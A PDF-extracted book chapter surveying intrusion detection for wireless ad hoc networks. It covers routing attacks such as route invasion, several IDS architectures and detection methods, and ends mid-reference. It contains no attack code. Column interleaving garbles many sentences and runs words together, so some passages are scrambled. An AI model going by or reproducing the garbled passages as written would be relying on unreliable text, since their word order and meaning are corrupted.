Zapata, M.G. (2005). Ad hoc on-demand distance work,oraprocessthatcanbemodifiedtofitthe
vector SAODV)
( routing. Retrieved October 7, problem area, that is, scaled to perform well with
2007, from INTERNET-DRAFT draft-guerrero- large-scale users.
manet-saodv-03.txt.
Surveillance System: A closed-circuit televi-
Zhou, L.D. (1999). Securing ad hoc networks. sion system used to monitor something.
IEEE Network, Special Issue on Network Security,
Watermarking (Digital Watermark): A
13(6), 24-30.
technique used to add hidden copyright notices or
other verification messages in a digital signal o
video so that it cannot be detected by a standard
playback device or viewer.
Wireless Network: A telecommunications
network whose interconnections between nodes
use standard protocol, but without the use of net-
work cabling.
0

Chapter XXXIII
Cutting the Gordian Knot:
Intrusion Detection Systems in
Ad Hoc Networks
John Felix Charles Joseph

Nanyang Technological University, Singapore
Amitabha Das
Boon-Chong Seet
Auckland Univerisity of Technology, New Zealand
Bu-Sung Lee
AbstrAct
Intrusion detection in ad hoc networks is a challenge because of the inherent characteristics of these
networks, such as, the absence of centralized nodes, the lack of infrastructure, and so forth. Furthermore,
in addition to application-based attacks, ad hoc networks are prone to attacks targeting routing proto-
cols. Issues in intrusion detection in ad hoc networks are addressed by numerous research proposals in
literature.Inthischapter,wefirstenumeratethepropertiesofadhocnetworkswhic
detectionsystems.Afterthat, significant
intrusion detection system (IDS) architectures and methodolo-
gies proposed in the literature are elucidated. Strengths and weaknesses of these works are studied and
are explained. Finally, the future directions which will lead to the successful deployment of intrusion
detection in ad hoc networks are discussed.
IntroductIon As the research activities matured, it has been

widely realized that security in such networks is
Wireless ad hoc networks have attracted exten- a major issue, and an extremely challenging one.
sive attention among researchers in recent years. The challenge arises mainly from the inherent
characteristics of ad hoc networks. Chief among ad hoc IDS architectures and methodologies. They
the characteristics, which affect the design of an offer an extensive analysis and understanding of
effective security framework for such networks, IDS in ad hoc networks. A comprehensive compari-
are the highly distributed, decentralized, and son between various proposed intrusion detection
dynamic natures of ad hoc networks. These prop- systems for ad hoc networks are discussed. Selected
erties, coupled with the lack of infrastructure in architectures and detection strategies explained by
ad hoc networks, introduce some unprecedented Mishra et al., which were found significant, are
issues, which are absent and never been explored detailed in this writing.
in conventional networks. Zhang, Huang, and Lee (2005) propose an
A typical security system consists of two major evaluation environment for MANET (mobile ad
components.Thefirstistheintrusion prevention
hoc network) intrusion detection systems. They
mechanism that aims to control access to the system emulated routing attacks and evaluated applica-
and relies mainly on cryptographic techniques. tion-based intrusion detection architectures over it.
The second one is the intrusion detection system The work introduces a novel concept of evaluating
that tries to detect if the prevention mechanism has ad hoc IDS models using known attacks. Routing
been compromised by intruders, and if so, come attack libraries are used, which exhibit attack
up with an appropriate response to combat such scenarios over the IDS model under-evaluation.
intrusions. The intrusion detection system (IDS) The IDS models are evaluated for operational cost
thus forms the second line of defense (Nadkarni and effectiveness. Detection accuracy and false
& Mishra, 2003). alarms are the primary evaluation parameters for
Cryptographic techniques rely on secure key assessing of the IDS model, in terms of detection
management and key distribution which require effectiveness.Theworkissignificantinproviding
supporting infrastructure. The lack of infrastruc- a test-bed for ad hoc IDS models. Similarly, Little
ture makes it extremely difficult to(2005) implement
proposes a test-bed called TeaLab for ad
cryptographic access control mechanisms in ad hoc IDS design.
hoc networks. This makes intrusion detection all Concurrent to simulation-based ad hoc test-
the more important for such networks. However, beds, Yang and Baras (2003) mathematically
it turns out that the inherent characteristics of ad analyze vulnerabilities in ad hoc networks. The
hoc networks render conventional IDS unsuitable authors provide a great deal of understanding to the
for such networks. This has spawned the research attack possibilities in ad hoc domain. Mathematical
in ad hoc IDS design (Brutch & Ko, 2003). methodsfindattacksexhaustively. - Inthistheore
This chapter illustrates the difficulties in attacks are hypothesized.
cal analysis all possible
providing an efficient intrusion detection system vulnerability analysis aids
This comprehensive
for ad hoc networks. In doing so, it discusses in the design of an effective ad hoc IDS design.
detail interesting ad hoc IDS models proposed in
literature. The strengths and weaknesses of these
models are explained and promising future direc- cHArActErIstIcs of Ad Hoc
tions for cutting the Gordian knot of ad hoc IDS nEtworks
are discussed.
Ad hoc networks differ from native wired/wireless
networks in various aspects. These unique charac-
bAckground teristics of ad hoc networks render typical security
systems unsuitable ( Awerbuch, Curtmola, Holmer,
Although various analyses on intrusion detection Rubens, & Nita-Rotaru, 2005; Papadimitratos &
mechanisms can be seen in the literature, only Haas, 2002). The fundamental concept of ad hoc
fewqualifyassignificant.Mishra,Nadkarni, andis to have seamless connectivity without
networks
Patcha (2004) give a detailed overview of various infrastructure or centralized control. The lack of

infrastructure and a centralized control node makes following are additional factors which also affect
it hard for security systems to be implemented. ad hoc network security design, but to a lesser
Furthermore, factors such as mobility, physical degree.
protection, and so forth affect the design of effec-
tive security models for ad hoc systems. These wireless links
factors are enumerated below.
In respect to security, wireless links are the weakest.
lack of Infrastructure This is due the omnipresence of wireless channel
and ease of physical access to the channel. Attacks
Ad hoc networks do not have a fixed infrastruc - such as eaves-dropping, active masquerading, and
ture. Typically, in conventional networks, the so forth are more possible in wireless networks
infrastructure provides a secure location for the than in a wired network. Furthermore, the most
implementation of critical security mechanisms notorious of all attacks, the denial-of-service
(Debar, Dacier, & Wespi, 1999). Due to the ab- (DoS) attacks, can be achieved easily in wireless
sence of infrastructure, ad hoc networks do not networks by jamming the wireless channel or by
provideasafeandefficientlocationto implement
routing attacks.
the security system. Additionally, operations such
as control, maintenance, and other administrative Poor Physical Protection
functions have become hard in a distributed and
infrastructure-less network. The only and apparent Usually, the nodes in an ad hoc network are mo-
resort is to install these critical modules in end-user bile and easily accessible physically. This raises
nodes. Implementing critical security systems in concerns of physical protection of these devices. A
unreliable end-user nodes pose a real challenge. single compromised node can bring down the entire
network due to its prerogatives in the network.
Absence of a central Authority
Energy constraints
Conventional network have traffic - concentra
tion areas, otherwise called choke points, where Since ad hoc network nodes are mostly mobile and
security systems can be placed and implemented wireless, energy constraints are also a security
efficiently.Controlnodesareplacedinissue. these choke
Typical symmetric encryption algorithms
points to monitor and control the network. Ab- such as 3DES (triple data encryption standard),
sence of centralized authority makes the network ADES (advanced encryption standard), and asym-
monitoring and control a challenging issue for ad metric encryption algorithms such as RSA (Rivest,
hoc networks. Shamir, and Adleman) and its variants incurs high
Every node in an ad hoc network has equal computation which may drain the battery of the
responsibility in network functions, such as routing, mobile node. Additionally, rnergy-targeted attacks
maintenance, and so forth. This unique charac- such as SDT (sleep deprivation torture), which
teristic will distribute the control authority to all aims to drain the mobile node’s battery, also need
nodes in the network. Nodes have to rely on other consideration while designing ad hoc security
neighbor nodes for routing and data forwarding. In system (Jacoby, Marchany, & Davis, 2004).
other words, nodes have to trust neighbor end-user
nodes for critical functions. As neighbors can be Unsuitability of Static Configurations
potential attackers, trusting unknown neighbors
is precarious to the integrity of security and other The obvious and immediate security solution for
critical systems. infrastructure-less and decentralized network is to
The above two issues are the crux of the secu- provide static security systems installed in nodes.
rity concern in the ad hoc network paradigm. The Ad hoc networks are mostly implemented over

Figure 1. Ad hoc routing insecurity: Route invasion
mobile nodes. Mobility introduces transient asso- routing security

ciations due to the dynamic nature of the network.
Therefore,predictionofsecurityconfiguration ina is an issue that is unique to ad
Routing security
dynamic ad hoc network may not be possible. Also, hoc networks (Papadimitratos & Haas, 2002).
static security systems have poor adaptability to Conventional networks have security systems
newattacks,whichrenderstheminefficient. implemented in IP, transport, or application layer.
Only ad hoc networks need security at the routing
delay constraints layer or protocol. The need arises from the nature
of ad hoc network technology where every node
Security systems are delay-sensitive. Especially in can function as a router. Apparently, this has raised
highly dynamic environments, delay guarantees new challenges and issues, since securing a rout-
are necessary for the security system to function ing protocol has never been an issue for security
properly. This necessity arises from the transient system designers for legacy networks.
associations in the ad hoc network, which is dis- Any node in an ad hoc network can add/modify/
cussed in the succeeding section. However, delay delete routes. This functionality is the root cause
guarantees are hard in dynamic networks because of the vulnerability of ad hoc routing protocols. A
of wireless connectivity and mobility. malicious node can send malicious routing control
messages to its neighbors. Since ad hoc networks
transient Associations are highly distributed, decentralized, and dynamic
systems, preventing or detecting a malicious rout-
The high mobility of nodes in ad hoc environment ingmessagebecomesdifficult.Moreover, - semanti
makes connections between the nodes transient. cally distinguishing between malicious and benign
Therefore, a node will not be able to get secu- routing messages is infeasible. Routing insecurity
rity specific information from its neighbor node
introduces new attack possibilities. Active attacks
permanently. In other words, the time frame for such as route invasion, and route disruption, cause
particular information to be valid in the ad hoc active damage to the network routing functions
network becomes very small because of transient (Awerbuch et al., 2005). Route invasion and disrup-
associations. tion attacks aim to modify, add, or delete benign
routes by sending malicious routing information

over the network. Passive attacks such as route at a point of time in the future. In other words,
monitoring and so forth try to eavesdrop for steal- a malicious behavior highly resembles another
ing sensitive information (Kong, Hong, & Gerla, benign behavior. Therefore, intrusion detection
To
.) 302 illustratesomeofthedifficultiesbecomes andtovery challenging.
familiarize routing insecurity in ad hoc networks,
a trivial attack scenario is considered.
Let us examine route invasion, which is a trivial IntrustIon dEtEctIon
but destructive attack. In Figure 1(a), the benign tEcHnIquEs
route between S and D is through 1. In Figure
1(b), Node M sends a malicious routing control Intrusion detection systems are mechanisms which
message, stating that it has a better route to D than provide a “second wall of defense” (Nadkarni &
throughNodeThis .1 modifiesthepath  DforSMishra, 2003) for the network system. In other
from S  1  D to S  M  2  3  D. The words, IDS is a backup, in case the frontline security
modifiedpathisnotonlyinefficient;itincludes mechanismsthe fail. Therefore, IDS fundamentally
malicious Node M into the path. This extends the assumes that cryptographic systems do not prevail
attack possibilities for the malicious node M on or have failed. As mentioned earlier, IDS in ad
node A or B. To thwart intrusion detection, Node M hoc networks cannot trust information from other
canimpersonateNodeand 1 canprovidefalsified
nodes. This limits the knowledge sharing between
routing information which supports its cause. the nodes. Knowledge in IDS is the new benign/
Due to the absence of centralized authority and malicious behavior patterns. Typical systems use
infrastructure, Node S has no trusted arbiter to get an arbiter (centralized) node to facilitate knowledge
advice regarding whether the announced path is sharing. However, the absence of any centralized
benign or otherwise. Malicious Node M has free node in ad hoc networks renders knowledge shar-
access to the wireless channel and can exhibit ing unreliable. Unreliable information in a security
anonymous routing attacks over S. system is worth no information at all.
Static crypto systems fail here, due to poor Conventional IDS are functional in application
physical protection, energy, and delay constraints. layer and monitor and detect malicious behavior
In the absence of centralized authority, dynamic exhibited by applications, such as, telnet, FTP,
crypto systems are not possible. Critical security SMTP, and so forth. In rare cases, relatively
systems such as key management, admission/ac- simpleIDS,suchasfirewallsareimplementedin
cess control, and authentication become hard to the IP layer. However, ad hoc networks’ necessity
implement due to the lack of infrastructure. Analo- for routing security has brought forth the need to
goustoIPspoofing,adhocroutingprotocols areIDS, which monitors and detects rout-
implement
prone to spoofing. However, unlike IP, spoofing ing protocols, such as AODV, OLSR, DSR, and so
in ad hoc networks is done at the routing protocol forth. An IDS design for a routing protocol is an
rather than the IP. Generically, ad hoc security unexplored area of research. The requirements of
needstopreventordetectspoofing.However, IDS for atherouting protocol differ vastly from the
issue is more serious than in IP, since the target of conventional IDS mechanisms.
the attack is the routing protocol itself. Research in ad hoc IDS design is still in the
Mobility and transient associations and dy- rudimentary stages. Some research works (Hi-
namicity make the detection of malicious routing jazi & Nasser, 2005) on ad- hoc IDS, which try
control messages impractical. In the above example, to cut the Gordian knot, follow strongly the IDS
Node S will not be able to determine with its local design methodologies of native IDS counterparts.
knowledge whether Node M is on a shortest route In addition, most of the IDS models proposed in
to D or acting maliciously. Because, even if Node the literature focus on application-level IDS. The
M is not on a shortest/optimal path to Node D assumption that application level IDS for ad hoc
now, due to changing topology, that may change network will suffice are the major weakness of

these works. Therefore, though these IDS models ing methodologies: misbehavior detection and
consider ad hoc network characteristics and provide anomaly detection. Misbehavior detection uses
a decentralized and distributed IDS, they fail to known malicious behavior patterns for comparison
address the routing insecurity. at the detection module. Anomaly detection uses
Zhang, Lee, and Huang (2003) propose a known normal behavior patterns and measures the
distributed and decentralized IDS system at the deviation of the node’s behavior from the known
routing layer but fail to describe the routing-level normal behavior patterns.
IDS model. Their work is similar to other research The main strength of misbehavior detection
models on ad hoc IDS design, which provid ap- is that the probability of false alarm is quite low.
plication-level IDS. Eventually, Huang and Lee However, the probability of deduction is also low,
(2004) analyze AODV intensively and provid a as unknown attacks will skip detection. On the
strong understanding of AODV and a guide to contrary, anomaly detection increases the prob-
design an AODV IDS at routing layer. However, ability of detection at the cost of increased false
they fail to state the statistical methodologies used alarm rates. Typically, both mechanisms are used
in the IDS design. inconcurrencetodefineatradeoffpointbetween
In what follows, the existing IDS models are probability of detection and false alarm rates.
enumerated and its strengths and weaknesses are
analyzed. Additionally, the feasibility of imple-
mentation of these methods is studied. Ad Hoc nEtwork Ids
rEquIrEMEnts
A sIMPlE Ids Having seen the fundamental operation of an

IDS, this section explores the essentialities and
Before venturing into the realm of ad hoc IDS challenges behind an efficient ad-hoc IDS. Un
designs, a short primer on a simple IDS model will derstanding the difference between an ad hoc IDS
be helpful. The fundamental working of an IDS is and the conventional IDS will help us to appreciate
shown in Figure 2. A typical IDS model consists of the requirements of an ad hoc IDS. Also, this will
three modules: detection module, response mod- aid us to understand the strength and weakness of
ule, and audit trails (Athanasiades, Abler, Levine, each proposed IDS models.
Owen, & Riley, 2003). Audit trails is a database The notorious Mitnick IP (Shimomura & Mar-
which stores known normal behavior or anomalous koff,6)spoofing
91 attacksareclassicexamples
behavior patterns. The detection modules analyze which demonstrate the destructive capabilities of
the observed behavior by comparing them with routing attacks. Legendary Mitnick used IP address
the known behavior patterns in the audit trails’ spoofingtoattackgovernmentandcommercial - net
database. There are two types of pattern match- works by feigning IP address. In ad hoc networks,
Figure 2. A simple intrusion detection architecture

spoofing network address becomes naïve, since

dits from application layer protocols record user
an attacker can get hands on the routing protocol behavior (Balajinath & Raghavan, 2001), such
itself.Thegamutofattackpossibilities as loginisattempts
infinite and failures, access rate, and
(Awerbuch, Curtmola., Holmer., Nita-Rotaru., & so forth. Whereas, audits from routing protocol
Rubens., 2004). In the following sections, we will record node behavior such as mobility, speed, con-
explore the factors that affect ad hoc IDS. nectivity, and so forth. The user behavior feature
differs distinctly from routing protocol behavior
knowledge limitations in Audits features. Hence, the methodologies analyzing the
audit trails have to be revised.
To assess whether a behavior is malicious or
benign, a node needs knowledge about different detection strategies
behaviors. It is evident that with more knowledge,
efficiency of distinguishing between malicious Detectionmethodologiescanbeclassifiedasrule
and benign behaviors increases. In conventional based, statistical, and hybrid, which are explained
networks, knowledge is shared using a trusted below.
arbitrary node. Absence of a centralized node in Rule-based detection use static rules to deter-
ad hoc networks limits the knowledge sharing. mine maliciousness in behavior. Rules are a set
Knowledge sharing is precarious in a decentralized of logical conditions, and when these conditions
and distributed network. A malicious node can are met, the behavior is categorized as malicious.
cast malicious information which may affect the Let us consider a simple rule to illustrate. Failure
integrity and security of IDS itself. When a node of three or more consecutive login attempts can
receives contradictory information from benign reasonably be used to decide that the behavior is
and malicious nodes, a decision dilemma occurs. malicious. More complex rules are formed using
IDS will not be able to decide which information typical logical reasoning mechanisms such as ex-
is correct. To avoid this high risk scenario, the pert systems. Static rule-based approaches which
nodes can only resort to local knowledge. Local are practical in conventional IDS fail due to the
knowledge is information gained through the node’s dynamic nature of ad hoc networks. The dynamic
its own experience. behavior creates transient connections which makes
It can be argued that if the number of benign intrusion detection through static rules almost
nodes is more than the malicious nodes, knowledge impossible. Furthermore, static security systems
sharing will be reliable. It is true to some extent. areknowntoperforminefficientlyindynamicand
According to Byzantine agreement (Lamport, distributed systems.
Shostak, & Pease, 1982), for the distributed global Statistical approaches uses probability estima-
knowledge to be reliable, benign nodes should tion theory (Duda, Hart, & Stork, 2000) to allow
be greater than two-thirds of the total number of someexibility
fl tocrisplogicandrule- - baseddetec
nodes. However, ad hoc networks have an interest- tion strategies. In statistical approach, probability
ing attack scenario, which can thwart Byzantine of behavior being malicious is determined by sta-
agreementeveninthepresenceofsufficient tistically benign
analyzing the known behavior patterns.
nodes.Anattackerusingaddressspoofing - cancre
However, statistical analysis of routing behavior in
ate nonexistent neighbor nodes and can emulate ad hoc networks is inconclusive and so is statistical
malicious behavior for the nonexistent nodes. This IDS in ad hoc networks. Conventional IDS sys-
gives the attacker the advantage of controlling the tems use statistical approach (Verwoerd & Hunt,
apparent number of malicious nodes in the network, 2002) after very intensive data analysis (Bykova,
thereby, invalidating Byzantine agreement. Ostermann, & Tjaden, 2001) and are derived using
It is important to consider that audit trails from computational intelligence methodologies (Duda,
routing protocols differ significantly from
Hart, audit
& Stork, 2000). These analyses are done for
information from application layer protocols. Au- audit trails from application layer protocols. The

lack of similar research on routing behavior audits a routing message is kept as minimal as possible to
for ad hoc networks raises an interesting question increasetheroutingefficiency.Thishasdecreased
on the suitability of statistical approaches for ad the features set describing a routing behavior. Dif-
hoc IDS. This is another unexplored research area ferent protocols have different features and the
in ad hoc security. feature set is highly protocol dependent.
Hybrid detection strategies combine the above
two approaches. Hybrid mechanisms are expected Inference
to perform better than the two approaches, since
they incorporate semantics (rule-based systems) It can be inferred that an ad hoc IDS model re-
and statistical intelligence. This is in fact supported quires a complete reconstruction of the current
by conventional IDS models where hybrid systems conventional IDS architecture. An IDS which
are usually superior. functions with only local knowledge, without a
In the ad hoc IDS paradigm, these detection centralized node, adapts to dynamic environments,
methodologies face numerous shortcomings. A and efficiently identifies malicious behavior wil
major impediment is the lack of features describ- be a magnum opusinthefieldofadhocnetwork
ing a routing behavior. Features are parameters security. Additionally, functions such as learning
or values describing a behavior. For example, the new attacks (part of adaptation) without corrupt-
number of server logins is a feature describing a ing the local knowledge base will be beneficial
user behavior over server-client-based application (Hossain, Bridges, & Vaughn, 2003; Pokrajac &
layer protocol. Similarly, delay between two rout- Lazarevic, 2004). Learning is itself a dynamic
ing requests is an example of a feature describing process; therefore learning in a highly dynamic,
a routing behavior. Typically, in a user behavior, distributed, decentralized, and insecure environ-
the number of features can extend from 40-100 or ment will be challenging.
more. On the contrary, a routing control message
has very few independent features. The content of
Figure 3. LIDS architecture

Ids ModEls a security threat to the ad hoc network. This is

detailed in the following sections by analyzing the
Intrusion detection systems have two major com- IDS architectures that uses mobile agents.
ponents: architectures and methodologies. IDS
architectures are the design which depict the overall local Intrusion detection system
functioning of the IDS, like the system shown using Mobile Agents
in Figure 2. On the other hand, IDS methodolo-
gies are models for detection strategies and their LIDS (Patrick, Olivier, Jean-Marc, Bernard,
supplementary functions, which are the internal Ludovic, & Ricardo, 2002) is an application-based
functionsoftheIDS.EfficiencyoftheIDSdepends IDS architecture for providing intrusion detection
both on the architecture and methodologies. Mishra in ad hoc network. The IDS architecture is shown
et al. (2004) analyzed various IDS architectures in Figure 3, which consists of agents. Agents are
systematically. Succeeding sections discuss about host-based intrusion detection modules running on
these IDS architectures following Mishra et al.’s all nodes. The architecture utilizes SNMP (simple
(2004) analysis. network management protocol) to communicate
Most of the architectures proposed in the with the neighbors.
literature assume that the methodologies used in A local LIDS agent is responsible for detect-
conventionalIDSmodelwillsufficein-anad hoc
ing theen
attacks locally. LIDS agents help neighbor
vironment. In the succeeding sections, the strength nodes to decide on a suspected intrusion. Also, it
of this assumption is analyzed. Furthermore, it has receives updates of new attack patterns from the
been observed that research work which focuses on neighbor nodes. The attack patterns are stored
IDS architectures does not consider the limitations in the information base. The MIB (management
of IDS methodologies and vice versa. information base) agent is used to manage the
information base. Between the neighbor nodes,
Architectures SNMP is used to exchange information such as
new attack patterns, decisions/responses, and so
IDS Using Mobile Agents forth. The MIB agent is responsible for retrieving
and sending information to/from neighbors using
IDS system is of two types: host-based and net- SNMP. The authors exploit the cooperative nature
work-based. Host-based IDS, as the name implies, of ad hoc network by sharing the information about
runs on individual nodes and functions partially new attack patterns between the nodes.
or completely autonomously. On the other hand, Additionally, mobile agents are software mod-
in network-based IDS, a centralized node is used ules which function autonomously for a dedicated
to monitor and detect intrusions on the network. It task. For example, the LIDS may designate a mo-
is obvious that network-based IDS is not possible bile agent (MA) to determine the probability of a
in ad hoc environment because of the absence of particular behavioral pattern to be malicious. The
a centralized authority. MA will autonomously travel between nodes and
Mobile agent is a software module, which aids gather evidence from traversing nodes’ MIB.
in distributed host-based intrusion detection. The This approach is relatively naïve. First, the
software module traverses through the nodes in the authors assume SNMP is secure in an ad hoc
network to accomplish a particular task, such as col- environment. In a network, where routing is inse-
lecting information, processing information, and so cure, SNMP is not as secure as in a conventional
forth. Mobile agents try to emulate network-based network. Second, as mentioned in the earlier sec-
intrusion detection by using a collective host-based tion, knowledge sharing is highly insecure in an
IDS. The mobile agent provides a good framework ad hoc network. This leads to the insecurity of
to create distributed host-based intrusion detection the LIDS system itself. Compromised nodes can
system. However, mobile agents themselves pose announce misleading intrusion detection informa-

tion, which will eventually corrupt the information Apparently, it can be seen that stationary secure
base of the entire network. Finally, in a network databaseSSD) ( conflictswiththeadhoc - character
with transient associations, feasibility of mobile istic of the absence of centralized authority. Even
agents is questionable. if a node is voted as the centralized node using
trust mechanisms, there is no surety that the node
Stationary Secure Database IDS will behave benignly. Furthermore, a malicious
node can corrupt the SSD by sending incorrect
Andrew (2001) proposes an IDS architecture which intrusion detection information. SSD creates a hot
consists of a stationary secure database (SSD). spot, which is a single point of failure. Addition-
Nodes post new information and decisions into ally, SSD assumes cryptographic mechanisms on
this database. The architecture is simple, as shown the communication between the IDS and SSD.
in Figure 4. Only detection processing is done on This violates the fundamental principle of IDS,
the host and the information is stored in a secure which assumes “no existence of cryptographic
stationary centralized point. mechanisms.”
The other components of the IDS are typical,
namely, misbehavior detection module (MDM), Modular Intrusion Detection Architecture
anomaly detection module (ADM), and commu-
nication port. These components form the mobile Kachirski and Guha (2002) propose an IDS where
agent. A local intrusion database is also used to the intrusion-detection system is modularized
storenodespecificattackpatternsinto andvarious
temporary
submodules, as shown in Figure 5.
information. The mobile agents will publish the The submodules are network monitoring, host
newly found attack pattern to the SSD, only after a monitoring, decision making, and response (ac-
certainlevelofconfidenceisreached. - The
tion)commu
modules. The modules are implemented in
nication port is used to communicate with the other mobile agent framework. Network monitoring is
nodes’ host-based intrusion detection system. packet monitoring over the network. Host monitor-
Figure 4. Secure stationary database architecture
0
Figure5.ModularizedIDSarchitecture
ing is monitoring of user behavior. A host-based Distributed IDS

monitor module exists in every node; however,
network-based monitor exists only in a selected DistributedIDSdifferssignificantlyfrommobile
few. Decision making and response modules exist agent-based IDS. Zhang, Lee, and Huang (2003)
in every node. in their pioneering work propose a distributed
The entire ad hoc network is segregated into IDS. The IDS architecture as shown in Figure 6
clusters. Each cluster has a cluster-head, which consists of local and cooperative intrusion detection
runs the network-based monitoring. Therefore, engines. These detection engines are interfaced
packet-level monitoring is done by the cluster-head. with their respective response modules.
Individual nodes use the packet-level audits from A local intrusion detection system is a typi-
the cluster-head to improve the performance of the cal host-based IDS. The cooperative intrusion
host-based intrusion detection system. detection engine is used to decide globally about
The strength of this IDS architecture is augmen- a particular behavior pattern. Collection of all
tation of network-based IDS with host-based IDS. cooperative detection engines on all nodes form
The combination of these mechanisms has proved a global intrusion detection engine. Semantically,
veryefficientinconventionalIDS.Furthermore, the
Cooperative detection is analogous to network-
authors have eliminated the single point of failure based intrusion detection. However, global deci-
by distributing the cluster heads. This also distrib- sion on behavior patterns will not dominate local
utes the management load between cluster-heads decision. Nonetheless, global decision will aid local
of the network. Also, host-level basis of decision response. Few incorrect decisions about a behav-
making on an intrusion makes this approach robust ioral pattern will not affect the global decision as
against attacks on the IDS itself. more numbers of correct decisions will invalidate
However, the architecture’s trust on the clus- the incorrect decisions.
ter-head is its weak point. Malicious behavior of Local detection engine functions autonomously,
a cluster-head will lead to the compromise of all independent of other nodes’ detection engines. The
nodes under its control. In additions, similar to the cooperative engine will not aid the local-detection
other two mobile agent-based IDS, this architecture engine for identifying a malicious behavior pat-
assumes secure routing, which may not be true. tern. This prevents propagation of malicious or

Figure6.DistributedIDSarchitecture
wrong detection to other nodes. However, the local • Light-weightfirewalls

response to an attack is aided by the cooperative • Trafficpolicing
detection engine. Furthermore, a global response • Intrusion tolerant routing
is deduced by collecting information from vari- • Intrusion detection
ous local intrusion detection engines of all nodes • Flow monitoring
in the network. Eventually, this global response • Reconfigurationmechanisms
will be used for response action for that particular • Multipath routing
behavior pattern. • Source initiated route switching
Although global decision sharing is secure
comparing behavior-pattern sharing, the authors It aims to minimize the damage incurred on
did not discuss how local intrusion detection relies the ad hoc network by destructive attacks such as
on the global responses. Routing insecurity pro- DoS, distributed denial of service (DDoS), and
vides the ability to an attacker to create nonexistent so forth. Routing and data traffic are protected
nodes. Therefore, the attacker can emulate mali- by TIARA. TIARA is a distributed framework.
cious behavior for these nonexistent nodes. Thus, TIARAisahighlyefficientcross-layerintrusion
the real majority of benign nodes will not help to prevention and detection mechanism. Exploring
guarantee security of the distributed IDS each of these techniques is beyond the scope of
this chapter. Mishra has briefly discussed these
Methodologies techniques in his survey of ad hoc IDS.
However, it should be noted that intrusion de-
TIARA tection is a module in the collection of techniques.
Theoperationalefficiencyoftheintrusiondetect
Techniques for intrusion-resistant ad hoc rout- is unknown. Furthermore, tolerance to attacks is
ing algorithms (TIARA) essentially an intrusion not the fundamental goal of an intrusion detection
prevention model (Ramanujan, Ahamad, Bon- system. Unless the attackers are eliminated from the
ney, Hagelstrom, & Thurber, 2000). TIARA is a networkortheattackisidentifiedandsegregat
conglomeration of innovative techniques which from benign traffic, the network is always under
provides: threat. Persistent attacks have high probability of
success. Therefore, immediate response to attack

is critical. TIARA has no response system for threshold, the node is discarded from any path.
intrusions. This method is analogous to fault-tolerance in
typical routing algorithms. This method effectively
Threshold-Based Detection detects and responds to malicious packet drop-
ping attacks (sinks). However, it fails to address
A simplistic approach to ad hoc IDS is threshold- attacks such as route invasion, route disruption,
based detection. Bhargava and Agrawal (2001) and so forth.
propose an ad hoc IDS which prevents internal at-
tacks (attacks within the network). Internal attacks State-Based Anomaly Detection
are exhibited by nodes belonging to the network
which behave maliciously, either by themselves One of the interesting approaches in conventional
or when compromised. Each node maintains a IDS models are state-based intrusion detection.
local variable called “MalCount” for every other Michael and Ghosh (2000) incorporate a state-
node, which is increased for a particular node if its based model in ad hoc intrusion detection. They
behavior is suspicious. Thus the MalCount array propose two anomaly detection methodologies,
in a node tracks the level or state of suspicion that whichusefinite-statemachines(FSM)FSM . have
the host node has regarding the other nodes. Each proved successful in conventional IDS because of
node shares its local state of suspicion with respect their adaptability and dynamic learning capability
to a particular node with other nodes in the network of new attacks.
using a special packet REMAL. When a node Anomaly detection methods proposed by Mi-
receives REMAL, it increases its local MalCount chael and Ghosh (2000) used protocol states. In
for the particular node under suspicion. the first method, the sequence and frequency of
The authors overlooked many aspects of ad hoc protocolstatesaremonitored.Intrusionisaffirm
security. First, malicious knowledge sharing using whenaparticularsequencedeviatessignificant
REMAL will have cumulative malign effect on from normal behavior patterns or the frequency of
the network. Second, the security of the REMAL states exceeds a threshold. To increase robustness,
packet is unknown. Eventually, the entire network their second approach uses probabilistic state-based
can be under threat by trusting unreliable REMAL intrusion detection. Each occurrence of a suspi-
packets. The crucial aspect of the security of the cious protocol state increases the probability of
IDS is not considered in this methodology. Fur- the behavior being malicious.
thermore, routing security is not addressed. These two approaches are well suited for trans-
Another interesting approach called watchdog- port and application layer protocols, which have
pathrater, which also uses threshold, is proposed many protocol states, and the protocol states are
by Sergio, Giuli, Kevin, and Mary (2000). Watch- predictable. For example, attacks such as, TCP SYN
dog-pathrater, as the name implies, has a monitor ood
fl attackcanbedetectedusingthisapproach.
and evaluator. Unlike Bhargava and Agrawal’s However, this is not true in the case of routing
(2001) approach, Watchdog-pathrater functions protocols. State sequence or frequency of states
independently and does not share information does not distinguish a malicious behavior from
with other nodes. When a packet is forwarded to a benign one. Traditionally, FSM were used to
a neighbor node, the forwarding node listens and extract semantics from user behavior through
monitors how the node behaves upon receiving application-layer protocols. In the case of ad hoc
a packet. A benign node will forward faithfully, routing protocols, semantics is not represented by
which is overheard by the monitor. However, when protocol states, but factors such as current topology,
the node does not forward the packet, the pathrater mobility, connectivity, and so forth are.
increases the failure rate for the path. The monitor
does not distinguish between maliciousness and
node faultiness. Upon the failure rate reaching the

futurE trEnds Finally, the most significant ad hoc network

characteristics which affect the IDS model are the
Research in ad hoc network security is in its three Ds: distributed, decentralized and dynamic
embryonic stages. Ad hoc network IDS is even nature. An IDS architecture which considers these
morerudimentary,sincethequestforan three factorswillessentiallybeefficient.Howeve
efficient
intrusion prevention mechanism is not over yet the IDS architecture should also consider the limi-
(Hubaux, Buttyan, & Capkun, 2001). Intrusion tations of detection methodologies.
prevention and detection mechanisms are mutually
productive for ad hoc security. Clearly, a concrete
and practical IDS model for ad hoc networks is conclusIon
yet to be evolved.
Historically, conventional IDS systems were The implementation of intrusion detection systems
subjected to intensive research and analysis before in ad hoc networks is hindered by the inherent
becoming practical. Analogous to conventional characteristics of these networks. These charac-
IDS, ad hoc intrusion detection needs more re- teristicswereexaminedandtheirsignificancewa
search. It is eminent that consideration of ad hoc observed. The differences between conventional
network characteristics plays a vital role in the and ad hoc intrusion detection systems are de-
denouement of the IDS model. In literature, most tailed. Requirements of an effective ad hoc IDS
of the research focus was on IDS architectures. are studied. Various proposed IDS architectures
However, IDS in ad hoc networks require in- and methodologies are explored and their strengths
novative detection strategies to resolve the issue and weakness are discussed. The future of ad hoc
pertaining to IDS in ad hoc networks. IDS depends mostly on the statistical properties
To summarize, we enumerate below the obser- of ad hoc network’s routing behaviors. Therefore,
vations made from the study of ad hoc IDS models considerable research and development is required
proposed in the literature. in this domain.
First, routing security should be the crux of
the IDS. Similar to conventional IDS, intensive
statistical analysis and research is required on the rEfErEncEs
feasibility of statistical and rule-based detection
methodologies, in respect to routing behavioral Andrew, B., Smith. (May 2001). An examination
data. Routing control messages produce a new kind of an intrusion detection architecture for wire-
of audit trails. New features linked to the proper- less ad hoc networks. Paper presented at the 5th
